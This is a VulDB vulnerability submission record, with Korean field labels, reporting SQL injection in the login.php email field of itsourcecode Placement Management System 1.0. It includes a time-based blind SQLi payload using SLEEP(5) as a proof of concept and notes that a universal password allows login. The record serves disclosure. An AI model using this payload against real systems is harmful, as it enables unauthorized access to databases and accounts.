| 제목 | itsourcecode Placement Management System 1.0 SQLi |
|---|
| 설명 | In the login.php file, the email field is not properly sanitized, which may lead to SQL injection vulnerabilities. Additionally, as long as there is any data in the users table of the database, it is possible to log in using a universal password.
————————Poc————————————
Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: [email protected]#' AND (SELECT 3451 FROM (SELECT(SLEEP(5)))zIEe) AND 'NilV'='NilV&pass=123 |
|---|
| 원천 | ⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE11-1.md |
|---|
| 사용자 | Dee.Mirage (UID 71702) |
|---|
| 제출 | 2024. 07. 31. PM 04:15 (2 연령 ago) |
|---|
| 모더레이션 | 2024. 08. 03. AM 08:49 (3 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 273540 [itsourcecode Placement Management System 1.0 login.php email SQL 주입] |
|---|
| 포인트들 | 20 |
|---|